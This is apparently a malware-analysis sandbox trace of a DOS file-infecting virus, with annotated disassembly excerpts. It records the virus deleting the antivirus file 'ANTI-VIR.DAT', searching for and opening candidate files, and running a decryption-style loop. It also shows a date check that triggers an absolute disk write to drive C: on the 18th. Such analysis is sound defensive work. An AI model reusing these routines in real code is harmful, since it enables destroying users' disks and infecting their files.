2018-12-25T12:36:11.430812472Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.432806396Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.434803825Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.437218171Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.438997244Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.44071305Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.442717393Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.444416904Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.446319868Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.448808655Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.450520175Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.452214951Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.454227991Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.455760006Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.457256133Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.459332345Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.460973065Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.462423488Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.464098473Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.465843287Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.467204073Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.468758636Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.47035631Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.471742769Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.473179689Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.475458196Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.47707175Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.478737144Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.480246146Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.481482923Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.482531866Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.484506966Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.485564006Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.486631287Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.488326508Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.489409714Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.490551877Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.492141307Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.493317803Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.495540261Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.498260443Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.50064348Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.502093582Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.503897308Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.505483313Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.50697799Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.509300927Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.510927596Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.512436489Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.51405837Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.515977232Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.517451569Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.519076049Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.520824314Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.522267609Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.523891017Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.525471214Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.526909355Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.528370785Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.530276069Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.531750727Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.533184173Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.535461144Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.537329558Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.539142945Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.541954365Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.543802331Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.545647027Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.548373937Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.550038193Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.55162443Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.553822565Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.555519006Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.557197239Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.559310002Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.561373404Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.563421282Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.566326132Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.567983515Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.56984671Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.571950486Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.574097127Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.575699346Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.577686358Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.579650146Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.581602187Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.583807229Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.585144452Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.586774829Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.588941735Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.592454977Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.59390398Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.59594914Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.597427003Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.598892347Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.600863053Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.602820963Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.604761687Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.61640415Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.617987402Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.619554421Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.622235861Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.623778265Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.625442894Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.627687747Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.629419891Z 250 PC: 12bb5 | UNKNOWN!
2018-12-25T12:36:11.630721189Z 67 PC: 12bee | Get or set file attributes
2018-12-25T12:36:11.638122728Z 65 PC: 12bf2 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T12:36:11.644822214Z 44 PC: 12c0e | Get time 0x12c0e: mov word ptr ds:[bp + 0x13c], dx
; Disassembly window captured around PC 0x12c0e, the return address of the
; "Get time" call (DOS INT 21h function 0x2C, logged as syscall 44).
; The first instruction of the window is on the log row directly above:
;   0x12c0e: mov word ptr ds:[bp + 0x13c], dx
; INT 21h/0x2C returns seconds in DH and hundredths in DL, so the word at
; bp + 0x13c receives a time-derived value. The routine at 0x12b7e on this
; page loads the same slot into DX.
;
; Go straight to the file search at 0x12c31.
0x12c13: jmp 0x12c31
; INT 21h/0x3B "Change directory" to the path at DS:DX = bp + 0x394. Not
; reached by fall-through here; its entry path is outside the window.
0x12c15: mov ah, 0x3b
0x12c17: lea dx, word ptr [bp + 0x394]
0x12c1b: int 0x21
; The byte at bp + 0x397 acts as a counter: once it equals 3 control leaves
; for 0x12c88, otherwise it is incremented and stored back.
; NOTE(review): presumably caps the number of directory changes made while
; searching. The slot sits 3 bytes after the path start, which would fit a
; ".." string plus terminator. Confirm against the data area.
0x12c1d: mov al, byte ptr ds:[bp + 0x397]
0x12c22: cmp byte ptr ds:[bp + 0x397], 3
0x12c28: je 0x12c88
0x12c2a: inc al
0x12c2c: mov byte ptr ds:[bp + 0x397], al
; INT 21h/0x4E "Find first file": CX = 0 is the attribute mask and DS:DX
; (bp + 0x253) points at the search pattern. Matches the log row
; "78 PC: 12c3d | Find first file".
0x12c31: mov ax, 0x4e00
0x12c34: mov cx, 0
0x12c37: lea dx, word ptr [bp + 0x253]
0x12c3b: int 0x21
; Carry clear means a match was found; otherwise leave for 0x12d45.
0x12c3d: jae 0x12c42
0x12c3f: jmp 0x12d45
; AX = 0x4300 is INT 21h "Get file attributes" for the name at DS:DX = 0x9e
; (log row "67 PC: 12c4b"). The push/pop pair is just a way to load AX.
; NOTE(review): 0x9e equals the default DTA at PSP offset 0x80 plus the 0x1e
; filename field, i.e. the file just found. This assumes the DTA was not
; relocated.
; Triage note: the rows that follow (a second attribute call, an open and a
; 4-byte read) look like inspection of a candidate file. Read together with
; the earlier deletion of 'ANTI-VIR.DAT', this is file-infector behaviour
; worth alerting on.
0x12c42: push 0x4300
0x12c45: pop ax
0x12c46: mov dx, 0x9e
0x12c49: int 0x21
2018-12-25T12:36:11.647268841Z 78 PC: 12c3d | Find first file
2018-12-25T12:36:11.654659472Z 67 PC: 12c4b | Get or set file attributes
2018-12-25T12:36:11.656965083Z 67 PC: 12c58 | Get or set file attributes
2018-12-25T12:36:11.658608882Z 61 PC: 12c60 | Open file (Filename = '')
2018-12-25T12:36:11.661056372Z 63 PC: 12c6f | Read file or device (Read 4 bytes on handle 2)

{"DateBased":true,"Day":18,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12736,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:11.785174249Z 42 PC: 12b63 | Get date 0x12b63: cmp dl, 0x12
; Disassembly excerpt around the Get date call (INT 21h, AH=2Ah).
; The first instruction of the excerpt (0x12b63, `cmp dl, 0x12`) is printed on
; the trace line just above; Get date returns the day of the month in DL, so
; the compare tests for day 18.
; bp is loaded outside this excerpt; data references are bp-relative.
; Analyst note: the INT 26h branch only runs when the date check matches, so
; a sandbox run on any other day of the month will not exercise it.
0x12b66: jne 0x12b6c                          ; not the 18th: skip the disk write
0x12b68: mov al, 2                            ; INT 26h drive number, 0 = A:, so 2 = C:
0x12b6a: int 0x26                             ; DOS absolute disk write; CX/DX/DS:BX (count, start sector, buffer) are set outside this excerpt
0x12b6c: popaw                                ; restore registers saved by a pusha that is not visible here
0x12b6d: mov ah, 0x47                         ; INT 21h AH=47h: get current directory
0x12b6f: mov dl, 0                            ; drive 0 = default drive
0x12b71: lea si, word ptr [bp + 0x344]        ; DS:SI -> buffer at bp+0x344 that receives the path
0x12b75: int 0x21                             ; logged in the trace as "Get current directory" (op 71 = 0x47)
0x12b77: call 0x12b7e                         ; subroutine starts below at 0x12b7e
0x12b7a: jmp 0x12bab                          ; continue past the subroutine after it returns
0x12b7c: add byte ptr [bx + si], al           ; not reached by fall-through; probably two data bytes decoded as code -- TODO confirm
0x12b7e: pushaw                               ; subroutine entry: save all general registers
0x12b7f: mov dx, word ptr ds:[bp + 0x13c]     ; dx = word at bp+0x13c (the code at 0x12c0e stores Get time's DX there)
0x12b84: jmp 0x12b8b                          ; hop over the exit stub below
0x12b86: nop
0x12b87: mov ah, 0x4c                         ; INT 21h AH=4Ch: terminate process; skipped on this path, reached from elsewhere if at all
0x12b89: int 0x21
0x12b8b: mov cx, 0xae                         ; count = 0xAE (174); the trace that follows logs 174 IOCTL calls from PC 12ba6, matching this count
0x12b8e: lea si, word ptr [bp + 0x16b]        ; si -> region at bp+0x16b; loop body is outside the excerpt (a pass over 0xAE units keyed by dx would fit -- TODO confirm)
2018-12-25T12:36:11.788397439Z 71 PC: 12b77 | Get current directory
2018-12-25T12:36:11.792900556Z 68 PC: 12ba6 | I/O control for devices (Set for = '���< t���2��æu��|�')
2018-12-25T12:36:11.794539977Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.796110921Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.797806305Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.812644094Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.814082292Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.815361932Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.816897554Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.818282018Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.819669882Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.82167593Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.823066621Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.824450447Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.826774581Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.828909886Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.831003459Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.83365234Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.835351744Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.837004671Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.839195474Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.840901637Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.842771296Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.844945461Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.847142194Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.849087106Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.851254699Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.853283286Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.854865353Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.856432115Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.859204495Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.860777634Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.862322473Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.864401964Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.866546964Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.868073614Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.884269051Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.885821847Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.88718601Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.889281377Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.890861224Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.892425612Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.894387285Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.895894105Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.897383933Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.899156011Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.901710252Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.903971177Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.906734541Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.908887175Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.9110127Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.913371669Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.9156107Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.91712396Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.918622406Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.921048167Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.92263006Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.924178867Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.92639712Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.928110855Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.929773562Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.933269434Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.935132429Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.936900999Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.939713684Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.941240612Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.942739696Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.944677467Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.946168564Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.947495936Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.948982612Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.950553916Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.952105224Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.953745232Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.955660178Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.957276502Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.958765442Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.961319025Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.962746961Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.964952675Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.967258434Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.969245774Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.971201823Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.973694175Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.975568136Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.97740801Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.980003103Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.981917391Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.983776759Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.985908469Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.987526629Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.989112796Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.99184442Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.993674151Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.995778562Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.997712677Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.999634236Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.001265474Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.003059222Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.004797973Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.006280858Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.007999864Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.010222681Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.01215171Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.01431762Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.017331884Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.019431802Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.021562971Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.024251621Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.026023751Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.027570577Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.030119094Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.032045096Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.033952673Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.03619527Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.037929521Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.039874062Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.042899387Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.044935538Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.046951305Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.049442891Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.051400648Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.053147388Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.055617381Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.057177709Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.059611816Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.061634011Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.06361042Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.065243864Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.067660016Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.069166259Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.070629143Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.072942081Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.074839794Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.076488009Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.078456602Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.080141109Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.081486097Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.083711185Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.085595813Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.087680671Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.089758085Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.091708405Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.093636746Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.096478719Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.098322348Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.100291231Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.102394746Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.104108506Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.105603118Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.10721642Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.108980083Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.110511455Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.112005467Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.113921574Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.115482754Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.117361521Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.11903642Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.120554733Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.122227746Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.12417855Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.126052685Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.128032034Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.130170582Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.131927523Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.14187788Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.144513787Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.145898524Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.148731203Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.150649287Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.152561539Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.154588027Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.156574976Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.158720329Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.160264089Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.162479669Z 250 PC: 12bb5 | UNKNOWN!
2018-12-25T12:36:12.164148943Z 67 PC: 12bee | Get or set file attributes
2018-12-25T12:36:12.16873463Z 65 PC: 12bf2 | Delete file (Filename = '>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�p��Q�[�N�[�M���>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>')
2018-12-25T12:36:12.173352984Z 44 PC: 12c0e | Get time 0x12c0e: mov word ptr ds:[bp + 0x13c], dx
; Disassembly excerpt around the Get time call (INT 21h, AH=2Ch).
; The first instruction of the excerpt (0x12c0e) is printed on the trace line
; just above: it stores DX, which Get time returns as DH=seconds and
